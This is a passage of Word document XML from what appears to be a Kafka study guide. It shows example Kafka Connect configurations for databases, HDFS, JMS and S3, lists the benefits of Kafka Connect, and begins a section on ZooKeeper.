          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JDBC source connector</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to pull data from a relational database (e.g., MySQL) and stream it into Kafka topics. It supports both </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>incremental</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full-table</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> data loads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24242E77"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Example configuration for MySQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B17442E"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669F4DFC"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name": "mysql-source-connector",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087F9C02"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fig": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2290BBF0"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nector.class": "io.confluent.connect.jdbc.JdbcSourceConnector",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2586BD68"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tasks.max": "1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1D02BE"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nection.url": "jdbc:mysql://localhost:3306/mydb",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFF0333"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nection.user": "username",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2A7CA3"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nection.password": "password",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFC7380"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mode": "incrementing",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E7B9C2"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incrementing.column.name": "id",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CE3386"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topic.prefix": "mysql-",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629B72D2"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "poll.interval.ms": "1000"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0090C5A6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFB1F3C"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EA27E6" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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ink Connector (Kafka to Database)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JDBC sink connector</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can push data from Kafka topics into a database like PostgreSQL or Oracle. This is useful for data warehousing or populating a data store.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A098576"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Example configuration for PostgreSQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A51D0B7"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC0D5F2"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name": "postgresql-sink-connector",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DC7A1B"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fig": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C454BCE"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nector.class": "io.confluent.connect.jdbc.JdbcSinkConnector",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2979EA31"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tasks.max": "1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451A10CC"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topics": "mysql-source-topic",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14034864"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nection.url": "jdbc:postgresql://localhost:5432/mydb",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFCD57B"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nection.user": "username",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A96AF84"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nection.password": "password",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D84102"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insert.mode": "insert",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5042AC56"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auto.create": "true"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DA4B71"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598CEC9D"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5E3694" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620"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2. Integrating Kafka with HDFS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6082B0"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Connect provides a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HDFS Sink Connector</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to stream data from Kafka topics to Hadoop Distributed File System (HDFS). This is typically used for storing large amounts of log or event data for long-term storage and further processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4482793F"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Example configuration for HDFS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C724186"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26489124"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name": "hdfs-sink-connector",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F4D54A"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fig": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A74F19"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nector.class": "io.confluent.connect.hdfs.HdfsSinkConnector",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74925C67"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tasks.max": "1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEFD208"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topics": "my-kafka-topic",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6459450F"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hdfs.url": "hdfs://namenode:8020",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBB4D94"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flush.size": "1000",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9C0DA4"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rotate.interval.ms": "60000",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C4357B"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topic.dir": "kafka",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02446E8D"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store.url": "hdfs://namenode:8020",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1651D9EA"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sink.partitioner.class": "io.confluent.connect.storage.partitioner.FieldPartitioner",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2197F2"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partition.field.name": "date",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCEF75D"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partitioner.class": "io.confluent.connect.storage.partitioner.DatePartitioner"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF4A837"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E62284"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C7084D" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620"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3. Integrating Kafka with External Message Queues (e.g., JMS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9676F8"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Connect can integrate with external message queues like </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JMS</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Java Message Service) via </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JMS Source and Sink Connectors</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. These connectors allow you to read messages from JMS queues/topics and send them to Kafka or push Kafka messages to JMS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5EF1D0"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Example configuration for a JMS source connector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276FC428"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C4F54C"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name": "jms-source-connector",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70031203"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fig": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D70024"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nector.class": "io.confluent.connect.jms.JmsSourceConnector",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132D3315"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tasks.max": "1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480D637A"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jms.url": "tcp://localhost:61616",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AE17A9"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jms.queue.name": "my-jms-queue",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CE8E27"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kafka.topic": "my-kafka-topic",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40304D41"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poll.interval.ms": "5000"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18107D59"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA584CA"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E421D6" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620"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lastRenderedPageBreak/>
        <w:t>4. Integrating Kafka with Cloud Storage (e.g., Amazon S3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F2CA28"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Connect has a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>S3 Sink Connector</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to export Kafka topics into </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Amazon S3</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for backup, archival, or processing in analytics platforms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E42624E"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Example configuration for S3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C23B41"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D67FC43"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name": "s3-sink-connector",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79457366"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fig": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786900D2"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nector.class": "io.confluent.connect.s3.S3SinkConnector",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F51605D"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tasks.max": "1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEAB52A"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topics": "my-kafka-topic",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A34DCF6"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s3.bucket.name": "my-s3-bucket",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290D6E89"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s3.region": "us-west-2",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035634D9"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flush.size": "10000",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D36095A"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storage.class": "io.confluent.connect.s3.storage.S3Storage",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D119517"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format.class": "io.confluent.connect.s3.format.avro.AvroFormat",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66917390"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schema.generator.class": "io.confluent.connect.storage.hive.HiveSchemaGenerator"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750B3DD7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B505BD6"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E00EF6" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620"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Benefits of Using Kafka Connect for Integration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AAD4A1" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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Ease of Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EABCF1F" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="144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Connect provides pre-built connectors for many popular data systems, making it easy to integrate Kafka with external systems like relational databases, HDFS, cloud storage, and messaging queues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5035BFAA" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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calability</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3906C0CA" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="144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Connect can scale out horizontally by running multiple workers in a distributed setup, allowing it to handle high-throughput scenarios effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531ECBAA" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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Fault Tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F782122" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="144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Connect is designed for fault tolerance. If a worker node fails, the tasks assigned to it will be automatically reassigned to available workers, ensuring continued operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9BF02B" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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duced Development Effort</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F595ACA" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="144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Connect reduces the need for custom integration code. By using pre-built connectors, developers do not need to manage the complexity of reading and writing to external systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FCE7EE" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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Flexible and Extensible</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5A4231" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="144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Connect is highly configurable and supports custom connectors, allowing integration with virtually any system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AA3C80" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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entralized Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DFDE27" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="144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e Kafka Connect REST API allows for centralized management of connectors, making it easier to deploy, configure, and monitor integrations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5A6E55" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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essage Transformation</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B47AFDB" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="144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Connect provides </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Single Message Transformations (SMTs)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that allow simple transformations of data during ingestion or export. This can be useful for formatting, filtering, or enriching data as it flows between Kafka and external systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083263DE" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102DE024" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620"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Connect provides a powerful and scalable solution for integrating Kafka with various external systems. By leveraging </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pre-built connectors</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custom extensions</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, Kafka Connect simplifies the process of integrating Kafka with data systems such as databases, file systems, cloud storage, and messaging queues. It allows organizations to easily create </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real-time data pipelines</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and move large volumes of data across different systems with minimal development effort.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4C491F" w14:textId="0FE44D47"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D51CA8E">
          <v:rect id="_x0000_i3179" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9DD98A" w14:textId="0E4A997A" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00246E17" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="796" w:name="_Toc196308276"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the purpose of Kafka's ZooKeeper, and can Kafka work without ZooKeeper</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="796"/>
    </w:p>
    <w:p w14:paraId="3DA149BB" w14:textId="66B361CD" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00897263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Purpose of Kafka's ZooKeeper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F964EF8" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00BB4FC5">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ZooKeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a distributed coordination service that plays a critical role in managing and coordinating the distributed Kafka cluster. It provides a centralized service for maintaining configuration information, naming, and synchronization across the Kafka brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7460659E" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00BB4FC5">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Here are some key responsibilities of </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ZooKeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31276366" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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lastRenderedPageBreak/>
        <w:t>Cluster Metadata Management</w:t>
      </w:r>
